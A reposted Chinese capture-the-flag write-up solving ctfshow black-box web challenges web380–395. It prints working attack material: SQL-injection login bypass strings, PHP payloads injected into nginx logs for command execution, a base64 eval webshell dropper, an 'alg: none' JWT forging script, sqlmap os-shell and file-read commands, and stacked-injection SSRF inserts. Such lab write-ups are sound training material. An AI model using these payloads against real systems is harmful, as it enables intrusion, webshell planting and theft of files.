ctfshow黑盒测试篇

news2024/9/21 22:04:27

文章目录

    • web380
    • web381
    • web382
    • web383
    • web384
    • web385
    • web386
    • web387
    • web388
    • web389
    • web390
    • web391
    • web392
    • web393
    • web394、395

web380

image-20230127133346297

目录扫出来了page.php

image-20230127133444209

$id应该是传的参数,是php的文件名

page.php?id=flag 访问源码拿到flag

web381

image-20230127135116845

就是这个目录

/alsckdfy/

访问就是flag

web382

/alsckdfy/ 继续访问这个目录

image-20230127140402695

万能密码直接登录进去就是flag

1' or 1#
admin'#
1'||1#

web383

同上

web384

密码前2位是小写字母,后三位是数字

就是单纯爆破密码

xy123

web385

/install

image-20230127143849378

/install/?install

image-20230127144030737

/alsckdfy/

admin admin888

web386

/install/

image-20230127145247470

访问/install/lock.dat 会把这个文件下载下来 ,啥也没有

image-20230127145648793

现在的目的应该是删除这个lock.dat然后重置密码

扫描后台发现clear.php

image-20230127150044652

这里传入什么参数也是靠黑盒来猜了,用file参数

image-20230127150221083

image-20230127150241551

web387

robots.txt存在/debug

访问/debug

image-20230127211458082

依旧是传入file参数

可以顺利执行文件

image-20230127211617240

/var/log/nginx/access.log 日志包含 UA传入命令

这里无法传参但是可以顺利执行命令

/debug?file=/var/log/nginx/access.log
<?php system('cat /var/www/html/alsckdfy/check.php>/var/www/html/1.txt');?>

用这个payload来读check.php 其实flag就在这里

image-20230127212101952

还有方法是通过 unlink命令来删除lock.dat与上题思路一样

<?php unlink('/var/www/html/install/lock.dat');?>

image-20230127212414632

web388

/alsckdfy/editor/下有个编辑器 有上传文件的功能

image-20230127215540411 image-20230127215622153

上传一个txt 来执行生成shell文件的命令

<?php 
system('echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==" | base64 -d > /var/www/html/shell.php');
?>

得到文件路径

/alsckdfy/attached/file/20230127/20230127140156_81482.txt

执行文件

/debug/?file=/var/www/html/alsckdfy/attached/file/20230127/20230127140156_81482.txt

成功生成shell.php

image-20230127220704357

源码里有flag

使用387的方法 日志包含也是可以

web389

访问/debug 显示无权限,多了个jwt

image-20230127221506124

是有密钥的 123456

image-20230127221708792

sub 修改成admin后可以顺利访问了

也可以用脚本生成无密钥的jwt

import jwt

# payload
token_dict = {
    "iss": "admin",
    "iat": 1632908199,
    "exp": 1632915399,
    "nbf": 1632908199,
    "sub": "admin",
    "jti": "71b84b8a5c0a43a2e13822a0f9b0b09e"
}

# headers
headers = {
    "alg": "none",
    "typ": "JWT"
    }   

jwt_token = jwt.encode(token_dict, key='',headers=headers, algorithm="none")  

print(jwt_token)

其他与388一样

web390

page.php?id=1 存在注入点 直接sqlmap梭了

os shell 梭

sqlmap -u http://4c9af2c3-b8a1-45ae-b2fb-efb2df866166.challenge.ctf.show/page.php?id=1 --os-shell
image-20230127232144599

或者直接读文件

sqlmap -u http://4c9af2c3-b8a1-45ae-b2fb-efb2df866166.challenge.ctf.show/page.php?id=1 --file-read /var/www/html/alsckdfy/check.php --batch

成功会将文件保存在本地

image-20230127233348653

web391

搜索框这里有注入

/search.php?title=1

sqlmap -u http://6f0aee0f-3618-44bf-84fe-2c2a5ca2ed88.challenge.ctf.show/search.php?title=1 --os-shell

web392

同上

web393

search.php的注入点,跑不出os-shell--file-read

image-20230128000128557

页面下方有个搜索引擎

点进去后直接就是一个百度搜索, ink.php?id=4 这里是不是存在注入 sqlmap没跑出来

search.php的注入点 去跑数据库

sqlmap -u http://94520176-d91c-4e45-8f53-206a179b60f7.challenge.ctf.show/search.php?title=4 --current-db
sqlmap -u http://94520176-d91c-4e45-8f53-206a179b60f7.challenge.ctf.show/search.php?title=4 -D 'ctfshow' --tables
sqlmap -u http://94520176-d91c-4e45-8f53-206a179b60f7.challenge.ctf.show/search.php?title=4 -D 'ctfshow' -T 'link' --columns

image-20230128002134013

link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url

这里可以利用ssrf可以添加跳转页面即url字段,比如添加file:///flag

访问这个页面时就可以读取/flag文件

在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面

/search.php?title=1';insert into link values(99,'flag','file:///flag');

然后访问image-20230128002858101

web394、395

与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过

flag的位置在/var/www/html/alsckdfy/check.php

search.php?title=1';insert into link values(10,'a',0x66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870);

/link.php?id=10

方法二

尝试使用gopher工具生成payload 打redis

但是没成功

预期解

是和388一样

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/182317.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

力扣(LeetCode)1664. 生成平衡数组的方案数(C++/Python3)

题目描述 模拟 逆向思维&#xff08;删除元素的性质&#xff09;&#xff1a;删除数组的某个元素&#xff0c;左侧元素的下标不变&#xff0c;右侧元素的下标发生奇偶替换。 算法流程 ① 由于算法从右往左枚举&#xff0c;预处理左侧的奇数下标元素之和oddl&#xff0c;偶数下…

过万春节服务全是问题无语了-Harbor镜像仓库访问404

1、背景 春节后的周六补班&#xff0c;累啊&#xff0c;到公司发现docker和kubelet服务都被停止了&#xff0c;可能是春节期间担心发生安全隐患吧&#xff0c;服务启动后发现很多镜像无法拉取了 到相关的节点上去尝试拉取镜像发现报了404错误 docker pull xxx.xxx.xxx.xxx/d…

初学者如何学好Java数组,不妨点进来看看,赶在新年前肝完的万字博客

新年好~~~新年开篇万字博客 —Java数组的学习,有点干货,建议收藏观看!!! 本篇介绍了数组的概念,数组创建和初始化.数组的使用(元素访问,和数组遍历方法),初识引用数据类型,简单介绍JVM内存分布,认识null,堆区空间的释放 二维数组相关知识的介绍~ 学习Java中的数组一.数组的基本…

变增益PID(含5种变增益模式PLC源代码+Simulink仿真)

变增益PID的详细理论讲解和应用场景,请参看下面的文章链接: 增益自适应PI控制器+死区过滤器(Smart PLC向导PID编程应用)_RXXW_Dor的博客-CSDN博客增益自适应和死区过滤器如果不和S7-200 SMART PLC PID向导组合实现,大家可以自行编写优化的PID指令。算法起始非常简单,具体…

2 分钟就能抓取任何网站的数据是怎么做到的?? #Browse AI

尽管现在使用网络的方式或多或少与 20 年前相同&#xff0c;但网络在我们生活中占据的地位越来越重要&#xff0c;网站却变得越来越繁琐。最重要的是&#xff0c;即使网络上有大量有价值的实时数据&#xff0c;收集它们也是非常昂贵和耗时的。Browse AI 是一款可以从任何网站提…

untiy TextMeshPro(简称TMP)组件详细内容

首先unity官方API对该组件的描述是&#xff1a; TextMeshPro 是 Unity 的最终文本解决方案。它是 Unity UI Text 和旧版 Text Mesh 的完美替代方案。 功能强大且易于使用的 TextMeshPro&#xff08;也称为 TMP&#xff09;使用高级文本渲染技巧以及一组自定义着色器&#xff1b…

Numpy(4)—Numpy 数组操作(修改数组形状、翻转数组、修改数组维度、连接数组、分割数组、数组元素的添加与删除

Numpy 数组操作 &#xff08;1&#xff09;修改数组形状 import numpy as npa np.arange(8) print (原始数组&#xff1a;) print (a) print (\n)b a.reshape(4,2) print (修改后的数组&#xff1a;) print (b)1&#xff09;numpy.ndarray.flat import numpy as npa np.a…

【ARM体系结构】之寄存器与三级流水线

1、ARM核的寄存器组织 1.1 寄存器概念介绍 控制器&#xff1a;控制程序运行&#xff0c;进行取指令操作&#xff0c;并将指令给到对应的运算器执行指令。 运算器&#xff1a;执行汇编指令&#xff0c;执行指令需要的使用的数据来源于寄存器&#xff0c;并将执行的执行结果返回…

如何在服务器上安装相应的依赖和包

我感觉这一篇的逻辑写的比较奇怪&#xff0c;于是想重写一篇。 python setup.py install报错“error: can‘t create or remove files in install directory”_ACMSunny的博客-CSDN博客 开始遇到的问题是要跑的程序数据太大&#xff0c;咱们通常会将本机上的Python程序和数据…

MIT6.830-2022-lab6实验思路详细讲解

系列目录 lab1 地址 : lab1 lab2 地址 :lab2 lab3 地址 :lab3 lab4 地址 :lab4 lab5 地址 :lab5 lab6 地址 :lab6 文章目录系列目录一、实验概述SimpleDB日志格式steal/force策略:二、实验正文Exercise 1 - rollbackExercise 2 - Recovery总结一、实验概述 In this lab y…

【SAP Fiori】X档案:Node.js 与 SAPUI5 开发环境的安装与配置

Node.js 与 SAPUI5 开发环境的安装与配置一、安装Node.js1、下载2、安装3、配置环境变量4、验证5、更改路径6、更改镜像源二、安装 Vue.js1、安装Vue2、查看版本三、安装webpack1、安装webpack2、安装webpack-cli3、验证是否安装成功四、新建Vue项目1、创建项目2、启动项目五、…

使用NoneBot2可视化平台搭建QQ聊天机器人:本地和云部署教程

NoneBot是一个基于Python 3.8的异步、开源和可扩展的框架&#xff0c;用于构建和运行聊天机器人&#xff0c;支持各种聊天平台&#xff0c;如Telegram&#xff0c;Discord和WeChat。它是基于nonebot库构建的&#xff0c;提供了一个易于使用的界面&#xff0c;用于创建聊天机器人…

Python爬虫之Scrapy框架系列(7)——XXTop250电影简介信息的获取及存储到本地

前面简单爬取了某Top250电影的一些信息。本文&#xff0c;来尝试搞到每个电影的简介信息。 目录&#xff1a;1. 获取电影简介信息1.1 第一步&#xff1a;配对每个电影对应的简介信息&#xff1a;First&#xff1a;包含电影简介信息url的获取Second&#xff1a;爬虫文件的更改Th…

Java和Scala中关键字package指定的是源文件的存放路径吗?

无为也&#xff0c;则用天下而有余&#xff1b;有为也&#xff0c;则为天下用而不足&#x1f52c; 目录 Scala代码演示 Java代码演示 总结 写在前面&#xff1a; 包&#xff08;package&#xff09;不是约定源文件存放的位置&#xff0c;而是约定源文件编译后生成的字节码…

数据挖掘,计算机网络、操作系统刷题笔记37

数据挖掘&#xff0c;计算机网络、操作系统刷题笔记37 2022找工作是学历、能力和运气的超强结合体&#xff0c;遇到寒冬&#xff0c;大厂不招人&#xff0c;可能很多算法学生都得去找开发&#xff0c;测开 测开的话&#xff0c;你就得学数据库&#xff0c;sql&#xff0c;orac…

Scanpy 单细胞测序基因分析

参考&#xff1a;https://www.bilibili.com/video/BV1sq4y1C7Qx/ https://scanpy-tutorials.readthedocs.io/en/latest/pbmc3k.html 代码下载&#xff1a;scanpy分析scRNA-seq数据基本流程&#xff08;含scanpy seurat两大工具对比&#xff09; 链接: https://pan.baidu.com/s…

SCSS函数——Map

SCSS函数——MapSCSS函数——MapMap的简单声明Map取值遍历Map获取值实现换肤效果1. 设置用户可以选择的主题2.创建主题需要颜色的Map集合3.在使用SCSS文件中导入函数和Scss文件4.构建一个themeCombine函数动态创建类名5.使用each对变量进行遍历Map函数1.get()取值函数2.deep-re…

STM32F10x数据手册之GPIO手册记录

前言 1、本文根据数据手册进行记录 2、由于手册的逻辑结构是呈现为总体到具体的结构&#xff0c;导致查看的时候不方便&#xff0c;所以在此记录&#xff0c;方便回顾 GPIO–输入模式 对比分析: 1、在此模式下,向GPIO口&#xff0c;输出高低电平是无效的。 2、GPIO初始电平与…

PHP反序列化新手入门学习总结

最近写了点反序列化的题&#xff0c;才疏学浅&#xff0c;希望对CTF新手有所帮助&#xff0c;有啥错误还请大师傅们批评指正。 php反序列化简单理解 首先我们需要理解什么是序列化&#xff0c;什么是反序列化&#xff1f; PHP序列化&#xff1a;serialize() 序列化是将变量…

DW 2023年1月Free Excel 第八次打卡 Excel数据可视化

第八章Excel数据可视化 数据下载地址与参考链接&#xff1a;https://d9ty988ekq.feishu.cn/docx/Wdqld1mVroyTJmxicTTcrfXYnDd 1 条形图 案例1 打开data/chap8/8.1xlsx中的【案例1】&#xff0c;现在有湖北区2022/01/01的不同商品的销售额。 问题1&#xff1a;如何更加直观…